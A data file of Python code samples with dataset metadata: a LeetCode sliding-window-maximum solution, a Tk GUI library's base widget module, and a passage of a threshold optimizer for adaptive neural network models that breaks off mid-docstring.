+{"seq_id":"570807433","text":"class Solution:\n def maxSlidingWindow0(self, nums, k: int):\n '''\n 给定一个数组 nums,有一个大小为 k 的滑动窗口从数组的最左侧移动到数组的最右侧。\n 你只可以看到在滑动窗口 k 内的数字。滑动窗口每次只向右移动一位。\n 返回滑动窗口最大值。\n 输入: nums = [1,3,-1,-3,5,3,6,7], 和 k = 3\n 输出: [3,3,5,5,6,7]\n '''\n if len(nums) <= 0:\n return []\n\n maxAry = [None] * (len(nums) - k + 1)\n\n for i in range(len(maxAry)):\n maxAry[i] = max(nums[i:i + k])\n\n return maxAry\n\n def maxSlidingWindow(self, nums, k: int):\n '''\n 给定一个数组 nums,有一个大小为 k 的滑动窗口从数组的最左侧移动到数组的最右侧。\n 你只可以看到在滑动窗口 k 内的数字。滑动窗口每次只向右移动一位。\n 返回滑动窗口最大值。\n 输入: nums = [1,3,-1,-3,5,3,6,7], 和 k = 3\n 输出: [3,3,5,5,6,7]\n '''\n if len(nums) <= 0:\n return nums\n max_ary = [max(nums[:k])]\n max_val = max_ary[0]\n for i in range(k, len(nums)):\n if nums[i] > max_val:\n max_val = nums[i]\n # 最大值滑出窗口\n elif nums[i - k] == max_val:\n max_val = max(nums[i - k + 1:i + 1])\n max_ary.append(max_val)\n return max_ary\n\n\ns = Solution()\nprint(s.maxSlidingWindow([1, 3, -1, -3, 5, 3, 6, 7], 3))\nprint(s.maxSlidingWindow([1, -1], 1))\nprint(s.maxSlidingWindow([7, 2, 4], 2))\n","sub_path":"Leetcode/239.maxSlidingWindow.py","file_name":"239.maxSlidingWindow.py","file_ext":"py","file_size_in_byte":1613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"504138515","text":"from __future__ import annotations\n\nimport collections.abc\nimport contextlib\nimport re\nfrom functools import partial, partialmethod\nfrom typing import Any, Callable, Iterator, Literal\n\nfrom ._constants import _BINDING_ALIASES, _KEYSYMS, _VALID_STATES\nfrom ._event import Event\nfrom ._layouts import LayoutManager\nfrom ._misc import ScreenDistance, TukaanError\nfrom ._utils import (\n _callbacks,\n _widgets,\n create_command,\n from_tcl,\n get_tcl_interp,\n py_to_tcl_arguments,\n reversed_dict,\n update_before,\n)\n\n\nclass ChildStatistics:\n def __init__(self, widget) -> None:\n self._widget = widget\n\n def number_of_type(self, type) -> int:\n try:\n return self._widget._child_type_count[type]\n except KeyError:\n return 0\n\n @property\n def children(self) -> list[BaseWidget]:\n return list(self._widget._children.values())\n\n @property\n def grid_managed_children(self) -> tuple:\n return tuple(\n self._widget.from_tcl(elem)\n for elem in self._widget._tcl_call((str,), \"grid\", \"slaves\", self._widget)\n )\n\n @property\n def position_managed_children(self) -> tuple:\n return tuple(\n self._widget.from_tcl(elem)\n for elem in self._widget._tcl_call((str,), \"place\", \"slaves\", self._widget)\n )\n\n\nclass MethodAndPropMixin:\n _tcl_call: Callable\n _keys: dict[str, Any]\n layout: LayoutManager\n tcl_path: str\n wm_path: str\n parent: TkWidget\n child_stats: ChildStatistics\n\n def __repr__(self) -> str:\n return (\n f\"\"\n )\n\n __str__ = __repr__\n\n def _repr_details(self) -> str:\n # overridden in subclasses\n return \"\"\n\n @property\n def is_busy(self) -> bool:\n return self._tcl_call(bool, \"tk\", \"busy\", \"status\", self)\n\n @is_busy.setter\n def is_busy(self, is_busy) -> None:\n if is_busy:\n self._tcl_call(None, \"tk\", \"busy\", \"hold\", self)\n else:\n self._tcl_call(None, \"tk\", \"busy\", \"forget\", self)\n\n @contextlib.contextmanager\n def busy(self):\n self.is_busy = True\n try:\n yield\n finally:\n self.is_busy = False\n\n @property\n def id(self) -> int:\n return self._tcl_call(int, \"winfo\", \"id\", self.tcl_path)\n\n def _cget(self, key: str) -> Any:\n if isinstance(self._keys[key], tuple):\n type_spec, key = self._keys[key]\n else:\n type_spec = self._keys[key]\n\n if type_spec == \"func\":\n # return a callable func, not tcl name\n result = self._tcl_call(str, self, \"cget\", f\"-{key}\")\n return _callbacks[result]\n\n if isinstance(type_spec, dict):\n result = self._tcl_call(str, self, \"cget\", f\"-{key}\")\n return reversed_dict(type_spec)[result]\n\n return self._tcl_call(type_spec, self, \"cget\", f\"-{key}\")\n\n def config(self, **kwargs) -> None:\n for key in tuple(kwargs.keys()):\n if isinstance(self._keys[key], tuple):\n # if key has a tukaan alias, use the tuple's 2-nd item as the tcl key\n kwargs[self._keys[key][1]] = kwargs.pop(key)\n\n get_tcl_interp()._tcl_call(\n None, self, \"configure\", *py_to_tcl_arguments(**kwargs)\n )\n\n @classmethod\n def from_tcl(cls, tcl_value: str) -> TkWidget:\n # unlike in teek, this method won't raise a TypeError,\n # if the return widget, and the class you call it on isn't the same\n # this could be annoying, but very useful if you don't know\n # what kind of widget it is and just want to get it\n\n # teek.Button.from_tcl(teek.Label().to_tcl())\n # >>> TypeError: blablabla\n\n # tukaan.Button.from_tcl(teek.tukaan().to_tcl())\n # >>> '.app.label_1'\n\n if tcl_value == \".\":\n return get_tcl_interp()\n\n return _widgets[tcl_value]\n\n def to_tcl(self) -> str:\n 
return self.tcl_path\n\n @property\n def _class(self):\n return self._tcl_call(str, \"winfo\", \"class\", self)\n\n @property\n def keys(self) -> list:\n return sorted(self._keys.keys())\n\n @property\n def bbox(self) -> tuple:\n return (self.x, self.y, self.x + self.width, self.y + self.height)\n\n @property # type: ignore\n @update_before\n def x(self) -> int:\n return self._tcl_call(int, \"winfo\", \"rootx\", self)\n\n @property # type: ignore\n @update_before\n def y(self) -> int:\n return self._tcl_call(int, \"winfo\", \"rooty\", self)\n\n @property # type: ignore\n @update_before\n def width(self) -> int:\n return self._tcl_call(int, \"winfo\", \"width\", self)\n\n @property # type: ignore\n @update_before\n def height(self) -> int:\n return self._tcl_call(int, \"winfo\", \"height\", self)\n\n def focus(self):\n self._tcl_call(None, \"focus\", self)\n\n def hide(self):\n if self.tcl_path == \".app\" or self._class == \"Toplevel\":\n self._tcl_call(None, \"wm\", \"withdraw\", self.wm_path)\n elif self.layout._real_manager == \"grid\":\n self._tcl_call(None, \"grid\", \"remove\", self.tcl_path)\n elif self.layout._real_manager == \"place\":\n self._temp_position_info = self._tcl_call(\n {\"-x\": int, \"-y\": int, \"-anchor\": str, \"-width\": int, \"-height\": int},\n \"place\",\n \"info\",\n self.tcl_path,\n )\n self._tcl_call(None, \"place\", \"forget\", self.tcl_path)\n\n def unhide(self):\n if self.tcl_path == \".app\" or self._class == \"Toplevel\":\n self._tcl_call(None, \"wm\", \"deiconify\", self.wm_path)\n elif self.layout._real_manager == \"grid\":\n self._tcl_call(None, \"grid\", \"configure\", self.tcl_path)\n elif self.layout._real_manager == \"place\":\n self._tcl_call(\n None,\n (\n \"place\",\n \"configure\",\n self.tcl_path,\n *(\n elem\n for key, value in self._temp_position_info.items()\n for elem in (key, value)\n if value is not None\n ),\n ),\n )\n\n def __parse_sequence(self, sequence: str) -> str:\n tcl_sequence = sequence\n regex_str = r\"\"\n\n if sequence in _BINDING_ALIASES:\n tcl_sequence = _BINDING_ALIASES[sequence]\n elif re.match(regex_str, sequence):\n search = re.search(regex_str, sequence)\n up_or_down = {\"Down\": \"Press\", \"Up\": \"Release\"}\n thing = search.group(2) # type: ignore\n tcl_sequence = f\"\" # type: ignore\n\n return tcl_sequence\n\n def _call_bind(\n self,\n widget_or_all: MethodAndPropMixin | Literal[\"all\"],\n sequence_s: tuple[str, ...] 
| str,\n func: Callable | Literal[\"\"],\n overwrite: bool,\n sendevent: bool,\n data: Any,\n ) -> None:\n def _real_func(func: Callable, data: Any, sequence: str, *args):\n event = Event(sequence, func, data)\n\n for (_, type_, attr), string_value in zip(_BINDING_SUBSTS, args):\n try:\n value = from_tcl(type_, string_value)\n if attr == \"keysymbol\":\n if value == \"??\":\n value = None\n elif value in _KEYSYMS.values():\n value = reversed_dict(_KEYSYMS)[string_value]\n except (ValueError, TukaanError):\n # ValueError when trying to int(\"??\")\n value = None\n\n setattr(event, attr, value)\n\n return func() if not sendevent else func(event)\n\n subst_str = \" \".join(subs for subs, *_ in _BINDING_SUBSTS)\n\n if isinstance(sequence_s, str):\n sequence_s = (sequence_s,)\n for sequence in sequence_s:\n self._tcl_call(\n None,\n \"bind\",\n widget_or_all,\n self.__parse_sequence(sequence),\n f\"{'' if overwrite else '+'} if\"\n + f\" {{[{create_command(partial(_real_func, func, data, sequence))}\"\n + f\" {subst_str}] eq {{break}} }} {{ break }}\"\n if callable(func)\n else \"\", # FIXME: this is disgustingly unreadable\n )\n\n def _bind(\n self,\n what,\n sequence: tuple[str, ...] | str,\n func: Callable,\n overwrite: bool = False,\n sendevent: bool = False,\n data=None,\n ) -> None:\n self._call_bind(\n what if what == \"all\" else self, sequence, func, overwrite, sendevent, data\n )\n\n def _unbind(self, what, sequence: str):\n self._call_bind(\n what if what == \"all\" else self, sequence, \"\", True, False, None\n )\n\n def generate_event(self, sequence: str):\n self._tcl_call(None, \"event\", \"generate\", self, self.__parse_sequence(sequence))\n\n bind = partialmethod(_bind, \"self\")\n unbind = partialmethod(_unbind, \"self\")\n bind_global = partialmethod(_bind, \"all\")\n unbind_global = partialmethod(_unbind, \"all\")\n\n\nclass TukaanWidget:\n \"\"\"Base class for every Tukaan widget\"\"\"\n\n ...\n\n\nclass TkWidget(MethodAndPropMixin):\n \"\"\"Base class for every Tk-based widget\"\"\"\n\n layout: LayoutManager\n\n def __init__(self):\n self._children: dict[str, BaseWidget] = {}\n self._child_type_count: dict[type, int] = {}\n _widgets[self.tcl_path] = self\n self.child_stats = ChildStatistics(self)\n\n\n_BINDING_SUBSTS = (\n (\"%D\", float, \"delta\"),\n (\"%K\", str, \"keysymbol\"),\n (\"%k\", str, \"keycode\"),\n (r\"%W\", TkWidget, \"widget\"),\n (r\"%X\", ScreenDistance, \"rel_x\"),\n (r\"%Y\", ScreenDistance, \"rel_y\"),\n (r\"%height\", ScreenDistance, \"height\"),\n (r\"%width\", ScreenDistance, \"width\"),\n (r\"%x\", ScreenDistance, \"x\"),\n (r\"%y\", ScreenDistance, \"y\"),\n)\n\n\nclass StateSet(collections.abc.MutableSet):\n \"\"\"\n Object that contains the state of the widget,\n though it inherits from MutableSet, it behaves like a list\n \"\"\"\n\n def __init__(self, widget: TkWidget) -> None:\n self._widget = widget\n\n def __repr__(self) -> str:\n return f\"\"\n\n def __iter__(self) -> Iterator[str]:\n return iter(self._widget._tcl_call([str], self._widget, \"state\"))\n\n def __len__(self) -> int:\n return len(self._widget._tcl_call([str], self._widget, \"state\"))\n\n def __contains__(self, state: object) -> bool:\n return self._widget._tcl_call(bool, self._widget, \"instate\", state)\n\n def add_or_discard(self, action: Literal[\"add\", \"discard\"], state: str) -> None:\n if state not in _VALID_STATES:\n raise RuntimeError\n if action == \"discard\":\n state = f\"!{state}\"\n\n self._widget._tcl_call(None, self._widget, \"state\", state)\n\n add: 
Callable[[str], None] = partialmethod(add_or_discard, \"add\")\n discard: Callable[[str], None] = partialmethod(add_or_discard, \"discard\")\n\n\nclass BaseWidget(TkWidget):\n _keys: dict[str, Any | tuple[Any, str]]\n\n def __init__(self, parent: TkWidget | None, **kwargs) -> None:\n self.parent = parent or get_tcl_interp()\n self.tcl_path = self._give_me_a_name()\n self._tcl_call: Callable = get_tcl_interp()._tcl_call\n\n TkWidget.__init__(self)\n\n self.parent._children[self.tcl_path] = self\n\n self._tcl_call(\n None, self._tcl_class, self.tcl_path, *py_to_tcl_arguments(**kwargs)\n )\n\n self.layout = LayoutManager(self)\n self._temp_manager = None\n\n if self._tcl_class.startswith(\"ttk::\"):\n self.state = StateSet(self)\n # else:\n # need to define separately for non-ttk widgets\n\n def __setattr__(self, key: str, value: Any) -> None:\n if key in self._keys.keys():\n self.config(**{key: value})\n else:\n super().__setattr__(key, value)\n\n def __getattr__(self, key: str) -> Any:\n if key in self._keys.keys():\n return self._cget(key)\n else:\n return super().__getattribute__(key)\n\n def _give_me_a_name(self) -> str:\n klass = type(self)\n\n # FIXME: more elegant way to count child types\n # itertools.count isn't good, because we need plain ints\n\n count = self.parent._child_type_count.get(klass, 0) + 1\n self.parent._child_type_count[klass] = count\n\n return f\"{self.parent.tcl_path}.{klass.__name__.lower()}_{count}\"\n\n def destroy(self):\n for child in self.child_stats.children:\n child.destroy()\n\n self._tcl_call(None, \"destroy\", self.tcl_path)\n del self.parent._children[self.tcl_path]\n del _widgets[self.tcl_path]\n","sub_path":"tukaan/_base.py","file_name":"_base.py","file_ext":"py","file_size_in_byte":13192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"313507126","text":"import numpy as np\nimport os.path\nfrom argparse import ArgumentParser\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import AdaBoostClassifier, RandomForestClassifier\nfrom sklearn.cluster import KMeans\nfrom typing import List, Optional, Tuple\n\nfrom dataset.dataset import Dataset, DataSeries\nfrom models.adaptive_model import AdaptiveModel\nfrom threshold_optimization.optimize_thresholds import get_serialized_info\nfrom utils.rnn_utils import get_logits_name, get_states_name, AdaptiveModelType, get_input_name\nfrom utils.np_utils import index_of, round_to_precision\nfrom utils.constants import OUTPUT, BIG_NUMBER, SMALL_NUMBER, INPUTS, SEQ_LENGTH, DROPOUT_KEEP_RATE\nfrom utils.file_utils import save_pickle_gz, read_pickle_gz, extract_model_name\nfrom controllers.distribution_prior import DistributionPrior\n\n\nPOWER = np.array([24.085, 32.776, 37.897, 43.952, 48.833, 50.489, 54.710, 57.692, 59.212, 59.251])\nVIOLATION_FACTOR = 0.01\nUNDERSHOOT_FACTOR = 0.01\nCONTROLLER_PATH = 'model-logistic-controller-{0}.pkl.gz'\nMARGIN = 1000\nMIN_INIT = 0.8\nMAX_INIT = 1.0\nC = 0.01\nNOISE = 0.01\n\n\ndef get_power_for_levels(power: np.ndarray, num_levels: int) -> np.ndarray:\n assert num_levels <= len(power), 'Must have fewer levels than power estimates' \n\n if len(power) == num_levels:\n return power\n\n median_index = int(len(power) / 2)\n start_index = median_index - int(num_levels / 2)\n end_index = start_index + num_levels\n return power[start_index:end_index]\n\n\ndef fetch_model_states(model: AdaptiveModel, dataset: Dataset, series: DataSeries):\n logit_ops = [get_logits_name(i) for i in range(model.num_outputs)]\n state_ops = [get_states_name(i) for i in range(model.num_outputs)]\n stop_output_ops = ['stop_output_{0}'.format(i) for i in range(model.num_outputs)]\n\n data_generator = dataset.minibatch_generator(series=series,\n batch_size=model.hypers.batch_size,\n metadata=model.metadata,\n should_shuffle=False)\n # Lists to keep track of model results\n labels: List[np.ndarray] = []\n states: List[np.ndarray] = []\n stop_outputs: List[np.ndarray] = []\n level_predictions: List[np.ndarray] = []\n level_logits: List[np.ndarray] = []\n\n # Index of state to use for stop/start prediction\n states_index = 0\n if model.model_type == AdaptiveModelType.CASCADE:\n states_index = -1\n\n seq_length = model.metadata[SEQ_LENGTH]\n num_sequences = model.num_sequences\n\n for batch_num, batch in enumerate(data_generator):\n # Compute the predicted log probabilities\n feed_dict = model.batch_to_feed_dict(batch, is_train=False)\n model_results = model.execute(feed_dict, logit_ops + state_ops + stop_output_ops)\n\n first_states = np.concatenate([np.expand_dims(np.squeeze(model_results[op][states_index]), axis=1) for op in state_ops], axis=1) # [B, D]\n\n inputs = np.array(batch[INPUTS])\n states.append(first_states)\n\n # Concatenate logits into a [B, L, C] array (logit_ops is already ordered by level).\n # For reference, L is the number of levels and C is the number of classes\n logits_concat = np.concatenate([np.expand_dims(model_results[op], axis=1) for op in logit_ops], axis=1)\n level_logits.append(logits_concat)\n\n # Compute the predictions for each level\n level_pred = np.argmax(logits_concat, axis=-1) # [B, L]\n level_predictions.append(level_pred)\n\n true_values = np.squeeze(batch[OUTPUT])\n labels.append(true_values)\n\n batch_stop_outputs = np.concatenate([np.expand_dims(model_results[op], axis=1) for op in stop_output_ops], axis=1) 
# [B, T]\n stop_outputs.append(batch_stop_outputs)\n\n states = np.concatenate(states, axis=0)\n level_predictions = np.concatenate(level_predictions, axis=0)\n labels = np.concatenate(labels, axis=0).reshape(-1, 1)\n level_logits = np.concatenate(level_logits, axis=0)\n stop_outputs = np.concatenate(stop_outputs, axis=0)\n\n y = (level_predictions == labels).astype(float)\n print('Level Accuracy: {0}'.format(np.average(y, axis=0)))\n\n return states, y, level_logits, labels, stop_outputs\n\n\ndef levels_to_execute(logistic_probs: np.ndarray, thresholds: np.ndarray) -> np.ndarray:\n # Compute the predictions based on this threshold setting. The level predictions are a 0/1\n # array which is 0 when we should NOT use this level and 1 when we should\n expanded_thresholds = np.expand_dims(thresholds, axis=1) # [S, 1, L]\n level_predictions = (logistic_probs > expanded_thresholds).astype(int) # [S, B, L]\n\n # Based on these level predictions, we compute the number of levels for each batch sample\n level_idx = np.arange(start=0, stop=thresholds.shape[-1])\n mask = (1.0 - level_predictions) * BIG_NUMBER # Big number when incorrect, 0 when correct\n index_mask = mask + level_idx # [S, B, L]\n levels = np.min(index_mask, axis=-1) # [S, B]\n levels = np.minimum(levels, thresholds.shape[-1] - 1).astype(int) # Clip the output, [S, B]\n\n return levels\n\n\ndef adjust_thresholds(clf_predictions: np.ndarray, thresholds: np.ndarray, target_distribution: np.ndarray, precision: int) -> np.ndarray:\n fp_one = 1 << precision\n thresholds = np.copy(thresholds)\n num_levels = thresholds.shape[1]\n num_budgets = thresholds.shape[0]\n\n clf_predictions = np.expand_dims(clf_predictions, axis=0) # [1, B, L]\n\n for level in range(num_levels):\n levels = levels_to_execute(logistic_probs=clf_predictions, thresholds=thresholds)\n level_counts = np.vstack([np.bincount(levels[i, :], minlength=num_levels) for i in range(num_budgets)]) # [S, L]\n level_fractions = level_counts / np.sum(level_counts, axis=-1, keepdims=True) # [S, L]\n\n direction = 1 - 2 * (target_distribution[:, level] > level_fractions[:, level]).astype(float)\n\n i = 0\n while (direction * (target_distribution[:, level] - level_fractions[:, level]) <= 0).all() and i < fp_one:\n thresholds[:, level] += (direction / fp_one)\n thresholds = np.clip(thresholds, a_min=0, a_max=1)\n\n levels = levels_to_execute(logistic_probs=clf_predictions, thresholds=thresholds)\n\n # Compute the approximate power and accuracy\n level_counts = np.vstack([np.bincount(levels[i, :], minlength=num_levels) for i in range(num_budgets)]) # [S, L]\n level_fractions = level_counts / np.sum(level_counts, axis=-1, keepdims=True) # [S, L]\n i += 1\n\n thresholds[:, level] -= (direction / fp_one)\n final_levels = levels_to_execute(logistic_probs=clf_predictions, thresholds=thresholds)\n level_counts = np.vstack([np.bincount(final_levels[i, :], minlength=num_levels) for i in range(num_budgets)]) # [S, L]\n final_distribution = level_counts / np.sum(level_counts, axis=-1, keepdims=True) # [S, L]\n\n return thresholds\n\n\ndef level_errors(logistic_probs: np.ndarray, thresholds: np.ndarray, network_predictions: np.ndarray) -> np.ndarray:\n \"\"\"\n Calculates the distribution of threshold errors for each model level. 
This is used purely for debugging.\n\n Args:\n logistic_probs: A [1, B, L] array of logistic regression probabilities.\n thresholds: A [S, L] array of learned thresholds.\n network_predictions: A [1, B, L] array of 0/1 classifications for each level.\n \"\"\"\n expanded_thresholds = np.expand_dims(thresholds, axis=1) # [S, 1, L]\n level_diff = logistic_probs - expanded_thresholds # [S, B, L]\n\n levels = levels_to_execute(logistic_probs, thresholds) # [S, B]\n\n for budget_idx, budget_thresholds in enumerate(thresholds): # [S]\n print(budget_thresholds)\n for level in range(thresholds.shape[1] - 1): # [L]\n is_incorrect = (1.0 - network_predictions[:, level]) # [B]\n is_correct = network_predictions[:, level] # [B]\n prob_diff = level_diff[budget_idx, :, level] # [B]\n chosen_levels = (levels[budget_idx, :] == level).astype(float) # [B]\n\n logistic_variance = np.square(np.std(logistic_probs[:, level]))\n logistic_avg = np.average(logistic_probs[:, level])\n\n incorrect_mask = is_incorrect * chosen_levels\n incorrect_diff = incorrect_mask * prob_diff\n avg_inc_diff = np.sum(incorrect_diff) / np.maximum(np.sum(incorrect_mask), SMALL_NUMBER)\n\n correct_mask = is_correct * chosen_levels\n correct_diff = correct_mask * prob_diff\n avg_cor_diff = np.sum(correct_diff) / np.maximum(np.sum(correct_mask), SMALL_NUMBER)\n\n print('Average Gap on Level {0}: Incorrect -> {1:.5f}, Correct -> {2:.5f}, Prob Avg (Var): {3:.5f} ({4:.5f})'.format(level, avg_inc_diff, avg_cor_diff, logistic_avg, logistic_variance))\n\n\ndef predictions_for_levels(model_predictions: np.ndarray, levels: np.ndarray, batch_idx: np.ndarray) -> np.ndarray:\n preds_per_sample: List[np.ndarray] = []\n for i in range(levels.shape[0]):\n level_pred = np.squeeze(model_predictions[batch_idx, levels[i, :]])\n preds_per_sample.append(level_pred)\n\n preds_per_sample = np.vstack(preds_per_sample) # [S, B]\n return preds_per_sample\n\n\ndef fit_anneal_rate(start_value: float, end_value: float, steps: int):\n # np.maximum is the elementwise max; np.max would treat the second argument as an axis\n return np.exp((1.0 / steps) * np.log(np.maximum(end_value, SMALL_NUMBER) / np.maximum(start_value, SMALL_NUMBER)))\n\n\n### Budget optimizer classes ###\n\nclass BudgetOptimizer:\n \n def __init__(self, num_levels: int, budgets: np.ndarray, precision: int, trials: int, max_iter: int, min_iter: int, patience: int, power: np.ndarray):\n self._num_levels = num_levels\n self._num_budgets = budgets.shape[0]\n self._budgets = budgets\n self._precision = precision\n self._trials = trials\n self._max_iter = max_iter\n self._patience = patience\n self._rand = np.random.RandomState(seed=42)\n self._thresholds = None\n self._min_iter = min_iter\n self._power = power\n\n def fit(self, network_predictions: np.ndarray, clf_predictions: np.ndarray) -> np.ndarray:\n raise NotImplementedError()\n\n def evaluate(self, network_predictions: np.ndarray, clf_predictions: np.ndarray) -> np.ndarray:\n raise NotImplementedError()\n\n def get_approx_power(self, levels: np.ndarray) -> np.ndarray:\n \"\"\"\n Approximates the power consumption given profiled power results.\n\n Args:\n levels: A [S, B] array of the levels for each sample (B) and budget (S)\n Returns:\n An [S] array containing the average power consumption for each budget's thresholds.\n \"\"\"\n level_counts = np.vstack([np.bincount(levels[i, :], minlength=self._num_levels) for i in range(self._num_budgets)]) # [S, L]\n normalized_level_counts = level_counts / np.sum(level_counts, axis=-1, keepdims=True) # [S, L]\n approx_power = np.sum(normalized_level_counts * self._power, axis=-1).astype(float) # [S]\n 
return approx_power, normalized_level_counts\n\n\nclass SimulatedAnnealingOptimizer(BudgetOptimizer):\n\n def __init__(self, num_levels: int, budgets: np.ndarray, precision: int, trials: int, max_iter: int, patience: int, temp: float, anneal_rate: float):\n super().__init__(num_levels, budgets, precision, trials, max_iter, patience)\n self._max_iter = max_iter\n self._temp = temp\n self._anneal_rate = anneal_rate\n\n def fit(self, network_results: np.ndarray, clf_predictions: np.ndarray):\n # Expand the clf predictions for later broadcasting\n clf_predictions = np.expand_dims(clf_predictions, axis=0) # [1, B, L]\n\n # Initialize thresholds, [S, L] array\n thresholds = round_to_precision(self._rand.uniform(low=0.2, high=0.8, size=(self._num_budgets, self._num_levels)), self._precision)\n thresholds = np.flip(np.sort(thresholds, axis=-1), axis=-1)\n thresholds[:, -1] = 0\n\n # The number 1 in fixed point representation\n fp_one = 1 << self._precision\n\n # Array of level indices\n level_idx = np.arange(start=0, stop=self._num_levels).reshape(1, 1, -1) # [1, 1, L]\n batch_idx = np.arange(start=0, stop=clf_predictions.shape[1]) # [B]\n\n # Variable for convergence\n early_stopping_counter = 0\n\n best_fitness = np.zeros(shape=(self._num_budgets,), dtype=float)\n best_power = np.zeros_like(best_fitness)\n margin = 0.4\n temp = self._temp\n\n for i in range(self._max_iter):\n prev_thresholds = np.copy(thresholds)\n \n # Generate a random move\n random_move = round_to_precision(self._rand.uniform(low=-margin, high=margin, size=thresholds.shape), self._precision)\n random_move[:, -1] = 0\n\n candidate_thresholds = np.clip(thresholds + random_move, a_min=0, a_max=1)\n\n levels = levels_to_execute(logistic_probs=clf_predictions, thresholds=candidate_thresholds)\n\n # Compute the approximate power and accuracy\n approx_power, _ = self.get_approx_power(levels=levels)\n dual_term = approx_power - self._budgets # [S]\n dual_penalty = np.where(dual_term > 0, VIOLATION_FACTOR * dual_term, -UNDERSHOOT_FACTOR * dual_term)\n\n correct_per_level = predictions_for_levels(model_predictions=network_results, levels=levels, batch_idx=batch_idx)\n accuracy = np.average(correct_per_level, axis=-1) # [S]\n\n # Compute the fitness (we aim to maximize this objective)\n fitness = accuracy - dual_penalty\n\n # Determine when to set thresholds based on fitness and temperature\n random_move_prob = self._rand.uniform(low=0.0, high=1.0, size=(self._num_budgets, ))\n fitness_diff = fitness - best_fitness # [S]\n temperature_prob = np.exp(-1 * fitness_diff / temp)\n\n selection = np.logical_or(fitness_diff > 0, temperature_prob > random_move_prob)\n best_fitness = np.where(selection, fitness, best_fitness)\n best_power = np.where(selection, approx_power, best_power)\n thresholds = np.where(selection, candidate_thresholds, thresholds)\n\n # Anneal the temperature\n temp = temp * self._anneal_rate\n\n print('Completed iteration {0}: Fitness -> {1}'.format(i+1, best_fitness))\n\n if np.isclose(thresholds, prev_thresholds).all():\n early_stopping_counter += 1\n else:\n early_stopping_counter = 0\n\n if early_stopping_counter >= self._patience:\n print('Converged.')\n break\n\n return thresholds\n\n\nclass CoordinateOptimizer(BudgetOptimizer):\n\n def fitness_function(self, thresholds: np.ndarray, network_results: np.ndarray, clf_predictions: np.ndarray, batch_size: int, violation_factor: float, undershoot_factor: float):\n # Compute the number of levels to execute\n levels = levels_to_execute(logistic_probs=clf_predictions, 
thresholds=thresholds)  # [S, B]\n\n        # Compute the approximate power\n        approx_power, normalized_level_counts = self.get_approx_power(levels=levels)\n        dual_term = approx_power - self._budgets  # [S]\n        dual_penalty = np.where(dual_term > 0, violation_factor, undershoot_factor) * np.square(dual_term)\n\n        # Compute the accuracy\n        batch_idx = np.arange(start=0, stop=batch_size)  # [B]\n        correct_per_level = predictions_for_levels(model_predictions=network_results, levels=levels, batch_idx=batch_idx)\n\n        accuracy = np.average(correct_per_level, axis=-1)  # [S]\n\n        return -accuracy + dual_penalty, approx_power\n\n    def fit(self, network_results: np.ndarray, clf_predictions: np.ndarray):\n        best_thresholds = np.ones(shape=(self._num_budgets, self._num_levels))\n        best_fitness = np.ones(shape=(self._num_budgets, 1), dtype=float)\n\n        # Reshape the validation arrays\n        valid_clf_predictions = np.expand_dims(clf_predictions, axis=0)  # [1, B, L]\n\n        for t in range(self._trials):\n            print('===== Starting Trial {0} ====='.format(t))\n\n            # Draw from the seeded generator so trials are reproducible\n            init_thresholds = self._rand.uniform(low=MIN_INIT, high=MAX_INIT, size=(self._num_budgets, self._num_levels))\n            init_thresholds = round_to_precision(init_thresholds, self._precision)\n            init_thresholds = np.flip(np.sort(init_thresholds, axis=-1), axis=-1)  # [S, L]\n\n            thresholds = self.fit_single(network_results=network_results,\n                                         clf_predictions=clf_predictions,\n                                         init_thresholds=init_thresholds)\n\n            # Compute the fitness\n            fitness, _ = self.fitness_function(thresholds=thresholds,\n                                               network_results=network_results,\n                                               clf_predictions=valid_clf_predictions,\n                                               batch_size=valid_clf_predictions.shape[1],\n                                               violation_factor=VIOLATION_FACTOR,\n                                               undershoot_factor=UNDERSHOOT_FACTOR)\n            fitness = np.expand_dims(fitness, axis=1)\n\n            best_thresholds = np.where(fitness < best_fitness, thresholds, best_thresholds)\n            best_fitness = np.where(fitness < best_fitness, fitness, best_fitness)\n            print('Completed Trial {0}. 
Best Fitness: {1}'.format(t, best_fitness))\n\n        # Report level usage under the best thresholds (not the last trial's)\n        levels = levels_to_execute(logistic_probs=clf_predictions, thresholds=best_thresholds)\n        level_counts = np.vstack([np.bincount(levels[i, :], minlength=self._num_levels) for i in range(self._num_budgets)])  # [S, L]\n        avg_level_counts = level_counts / np.sum(level_counts, axis=-1, keepdims=True)\n\n        self._thresholds = best_thresholds\n        return best_thresholds, avg_level_counts\n\n    def print_accuracy_for_levels(self, clf_predictions: np.ndarray, network_results: np.ndarray, thresholds: np.ndarray):\n        levels = levels_to_execute(logistic_probs=clf_predictions, thresholds=thresholds)\n        level_counts = np.vstack([np.bincount(levels[i, :], minlength=self._num_levels) for i in range(self._num_budgets)])  # [S, L]\n        avg_level_counts = level_counts / np.sum(level_counts, axis=-1, keepdims=True)\n\n        batch_idx = np.arange(levels.shape[1])  # [B]\n        correct_per_level = predictions_for_levels(model_predictions=network_results, levels=levels, batch_idx=batch_idx)\n\n        print('Level Counts: {0}'.format(avg_level_counts))\n\n        # Calculate the accuracy for each level\n        for i in range(self._num_levels):\n            level_mask = (levels == i).astype(float)  # [S, B]\n            level_correct = np.sum(correct_per_level * level_mask, axis=-1)  # [S]\n            level_accuracy = level_correct / (np.sum(level_mask, axis=-1) + SMALL_NUMBER)  # [S]\n\n            print('Accuracy when stopping at level {0}: {1}'.format(i, level_accuracy))\n\n    def evaluate(self, network_results: np.ndarray, clf_predictions: np.ndarray) -> np.ndarray:\n        \"\"\"\n        Evaluates the already-fitted thresholds on the given data points.\n        \"\"\"\n        assert self._thresholds is not None, 'Must fit the optimizer first'\n\n        # Compute the number of levels to execute per sample\n        levels = levels_to_execute(logistic_probs=clf_predictions, thresholds=self._thresholds)\n\n        # Compute the accuracy for each budget\n        batch_size = network_results.shape[0]\n        batch_idx = np.arange(start=0, stop=batch_size)  # [B]\n        correct_per_level = predictions_for_levels(model_predictions=network_results, levels=levels, batch_idx=batch_idx)\n\n        accuracy = np.average(correct_per_level, axis=-1)  # [S]\n\n        return accuracy\n\n    def fit_single(self, network_results: np.ndarray, clf_predictions: np.ndarray, init_thresholds: np.ndarray) -> np.ndarray:\n        \"\"\"\n        Fits the optimizer to the given predictions of the logistic regression model and neural network model.\n\n        Args:\n            network_results: A [B, L] array of results for each sample and level in the neural network. 
